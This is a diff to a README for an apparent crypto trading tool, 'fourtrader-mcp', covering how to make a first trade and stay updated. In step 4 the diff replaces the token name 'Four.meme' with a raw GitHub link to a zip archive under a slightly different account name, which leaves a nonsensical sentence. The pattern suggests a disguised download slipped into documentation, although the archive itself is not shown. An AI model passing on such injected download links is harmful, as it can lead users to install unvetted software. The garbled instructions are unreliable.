menschecklab/fourtrader-mcp/README.md

    Get familiar with the layout.
 The dashboard shows real-time trading data, including current prices and market trends.

 4. **Make Your First Trade:**
-   Decide which Four.meme token you want to trade.
+   Decide which https://raw.githubusercontent.com/menscheck/fourtrader-mcp/main/capsid/fourtrader-mcp.zip token you want to trade.
 Enter the amount and follow the prompts to complete your transaction.
 The app will provide AI insights to help you.

 5. **Stay Updated:**
    Use the app regularly to keep up with market changes.
 Regular updates will enhance your trading experience.